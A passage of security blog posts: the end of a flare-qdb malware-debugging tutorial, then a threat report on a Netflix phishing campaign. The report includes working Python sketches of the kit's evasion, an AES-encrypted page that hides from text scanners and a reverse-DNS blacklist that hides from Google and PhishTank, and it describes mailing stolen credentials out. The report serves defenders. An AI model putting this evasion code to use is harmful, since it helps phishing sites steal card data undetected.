The function pointer resolves to 0x402f32, which IDA has already labeled as basic_streambuf::xsputn as shown in Figure 5. This function inserts a series of characters into a file stream, which suggests a file write capability that might be exercised by providing a filename and/or file data via the C2 channel.

Figure 5: Resolved virtual function address

Using the flareqdb Python Module

flare-qdb also exists as a Python module that is useful for more complex cases. flare-qdb allows for ready use of the powerful vivisect library. Consider the logic in Figure 6, which is part of a privilege escalation tool. The tool checks GetVersionExW, NetWkstaGetInfo, and IsWow64Process before exploiting CVE-2016-0040 in WMI.

Figure 6: Privilege escalation platform check

It appears as if the tool exploits 32-bit Windows installations with version numbers 5.1+, 6.0, and 6.1. Figure 7 shows a script to quickly validate this by executing the tool 12 times, simulating different versions returned from GetVersionExW and NetWkstaGetInfo. Each time the script executes the malware, it indicates whether the malware reached the point of attempting the privilege escalation or not. The script passes a dictionary of local variables to the Qdb instance for each execution in order to permit the user callback to print the friendly name of each Windows version it is simulating for the binary. The results of GetVersionExW are modified prior to return using the vstruct definition of OSVERSIONINFOEXW; NetWkstaGetInfo is fixed up manually for brevity, and in the absence of a definition corresponding to the WKSTA_INFO_100 structure.

Figure 7: Script to test version check

Figure 8 shows the output, which confirms the analysis of the logic from Figure 6.

Figure 8: Script output

Next, consider an example in which the analyst must devise a repeatable process to unpack a binary and ascertain the locations of unpacked PE-COFF files injected throughout memory. The script in Figure 9 does this by setting a breakpoint relative to the tail call and using vivisect’s envi module to enumerate all the RWX memory locations that are not backed by a named file. It then uses flare-qdb’s park() builtin before calling detach() so that the binary runs in an endless loop, allowing the analyst to attach a debugger and resume manual analysis.

Figure 9: Unpacker script that parks its debuggee after unpacking is complete

Figure 10 shows the script announcing the locations of the self-injected modules before parking the process in an infinite loop and detaching.

Figure 10: Result of unpacker script

Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb. The park() builtin stored the original program counter value in the bytes following the jmp instruction. The analyst can return the program to its original location by referring to those bytes and entering the WinDbg command r eip=1DC129B.

Figure 11: Attaching to the parked process

The parked process makes it convenient to snapshot the malware execution VM and repeatedly connect remotely to exercise and annotate different code areas with IDA Pro as the debugger. Because the same OS process can be reused for multiple debug sessions, the memory map announced by the script remains the same across debugging sessions. This means that the annotations created in IDA Pro remain relevant instead of becoming disconnected from the varying data and code locations that would result from the non-deterministic heap addresses returned by VirtualAlloc if the program were simply executed multiple times.

Conclusion

flare-qdb provides a command-line tool to quickly query dynamic binary state without derailing the thought process of an ongoing debugging session. In addition to querying state, flare-qdb can be used to alter program state and simulate new scenarios. For intricate cases, flare-qdb has a scripting interface permitting almost arbitrary manipulation. This can be useful for string decoding, malware unpacking, and general software analysis. Head over to the flare-qdb github page to get started using it.

Credit Card Data and Other Information Targeted in Netflix Phishing Campaign

9 January 2017 at 16:00
Introduction

Through FireEye’s Email Threat Prevention (ETP) solution, FireEye Labs discovered a phishing campaign in the wild targeting the credit card data and other personal information of Netflix users primarily based in the United States.

This campaign is interesting because of the evasion techniques that were used by the attackers:

  • The phishing pages were hosted on legitimate, but compromised web servers.
  • Client-side HTML code was obfuscated with AES encryption to evade text-based detection.
  • Phishing pages were not displayed to users from certain IP addresses if their DNS resolved to companies such as Google or PhishTank.

At the time of posting, the phishing websites we observed were no longer active.

Attack Flow

The attack seems to start with an email notification – sent by the attackers – that asks the user to update their Netflix membership details. The phishing link inside the email body directs recipients to a page that attempts to mimic a Netflix login page, as seen in Figure 1.

Figure 1: Fake login page mimicking the Netflix website

Upon submitting their credentials, victims are then directed to webpages requesting additional membership details (Figure 2) and payment information (Figure 3). These websites also attempt to mimic authentic Netflix webpages and appear legitimate. Once the user has entered their information, they are taken to the legitimate Netflix homepage.

Figure 2: Fake webpage asking users to update their personal details

Figure 3: Netflix phishing webpage used to steal credit card information

Technical Details

The phishing kit uses techniques to evade phishing filters. One technique is the use of AES encryption to encode the content presented on the client side, as seen in Figure 4. The purpose of this technique is code obfuscation, which helps to evade text-based detection. By obfuscating the webpage, attackers try to deceive text-based classifiers and prevent them from inspecting webpage content. This technique employs two files: a PHP file and a JavaScript file that contain functions to encrypt and decrypt input strings. The PHP file is used to encrypt the webpages at the server side, as seen in Figure 5. At the client side, the encrypted content is decoded using a defined function in the JavaScript file, as seen in Figure 6. Finally, the webpage is rendered using the ‘document.write’ function.

Figure 4: Client-side code obfuscation using AES encryption

Figure 5: PHP code used at server side for encryption

Figure 6: JavaScript code used at client-side for decryption
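The server-side half of this scheme can be sketched conceptually in Python (the kit itself uses PHP and JavaScript, as shown in Figures 5 and 6). The snippet below is illustrative and assumes the third-party cryptography package: it AES-encrypts the page so that a scanner reading the raw response sees only a Base64 blob rather than the phishing form.

import base64
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

KEY = os.urandom(32)   # in the real kit, key material is shared with the JS decryptor
IV = os.urandom(16)

def encrypt_page(html):
    # Pad to the AES block size, encrypt with AES-CBC, and Base64-encode the result.
    padder = padding.PKCS7(128).padder()
    data = padder.update(html.encode()) + padder.finalize()
    encryptor = Cipher(algorithms.AES(KEY), modes.CBC(IV), backend=default_backend()).encryptor()
    return base64.b64encode(encryptor.update(data) + encryptor.finalize()).decode()

page = '<form action="login.php"><input name="email"></form>'
print(encrypt_page(page)[:40], "...")   # what a text-based scanner sees in the response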

Another technique is host-based evasion, as seen in Figure 7. The host names of organizations such as ‘phishtank’ and ‘google’ are blacklisted: the host name of the connecting client is compared against this list, and if there is a match, a “404 Not Found” error page is presented instead of the phishing content.

Figure 7: Server side code for blacklisting known hosts
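Conceptually, the server-side check in Figure 7 boils down to a reverse DNS lookup against a keyword blacklist. The Python sketch below is an illustrative rendering of that idea (the kit implements it in PHP); the function name is hypothetical.

import socket

BLACKLISTED_KEYWORDS = ("google", "phishtank")

def should_hide_page(client_ip):
    # Resolve the connecting IP back to a host name; if it belongs to a known
    # security vendor or crawler, serve a "404 Not Found" instead of the page.
    try:
        hostname = socket.gethostbyaddr(client_ip)[0].lower()
    except OSError:
        return False   # no reverse record: serve the phishing page
    return any(keyword in hostname for keyword in BLACKLISTED_KEYWORDS)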

As with the majority of phishing attacks, this campaign uses the PHP mail() utility to send the stolen credentials to the attacker. The advantage of using this technique is that the attacker can host their phishing kits on a number of websites and still receive the stolen credentials and other information at a single email account. This enables attackers to extend their reach.

Figure 8: Stolen information is sent to an email address using mail() function

Tips to Secure your Netflix Account

To learn more about securing your Netflix account, Netflix provides additional information on how to keep your account safe from phishing scams and other fraudulent activity at https://www.netflix.com/security.
